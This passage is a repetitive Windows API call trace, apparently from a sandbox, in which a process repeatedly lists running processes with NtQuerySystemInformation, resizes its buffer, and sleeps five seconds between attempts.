ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.244] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.294] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.324] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.331] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 